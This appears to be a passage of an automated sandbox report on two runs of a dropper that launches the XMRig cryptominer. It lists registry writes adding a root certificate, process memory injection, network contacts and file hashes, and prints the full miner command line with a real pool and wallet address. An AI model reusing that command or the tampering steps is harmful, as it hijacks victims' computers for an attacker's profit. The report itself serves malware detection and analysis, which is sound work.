memory/2748-77-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-78-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-79-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-80-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-81-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-82-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-83-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-84-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4344 wrote to memory of 4824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4344 wrote to memory of 4824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4824-16-0x0000023095C40000-0x0000023095C60000-memory.dmp
memory/4824-17-0x0000023095EA0000-0x0000023095EC0000-memory.dmp
memory/4824-18-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-19-0x0000023095EC0000-0x0000023095EE0000-memory.dmp
memory/4824-20-0x000002312A030000-0x000002312A050000-memory.dmp
memory/4824-21-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-22-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-25-0x000002312A030000-0x000002312A050000-memory.dmp
memory/4824-24-0x0000023095EC0000-0x0000023095EE0000-memory.dmp
memory/4824-23-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-26-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-27-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-28-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-29-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-30-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-31-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-32-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-33-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-34-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-35-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-36-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-37-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-38-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-39-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-40-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-41-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-42-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-43-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-44-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-45-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-46-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-47-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-48-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-49-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-50-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-51-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-52-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-53-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-54-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-55-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-56-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-57-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-58-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-59-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-60-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-61-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-62-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-63-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-64-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-65-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-66-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-67-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-68-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-69-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-70-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-71-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-72-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-73-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-74-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-75-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-76-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-77-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-78-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-79-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-80-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-81-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-82-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-83-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
memory/4824-84-0x00007FF7645D0000-0x00007FF7650D3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:49
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
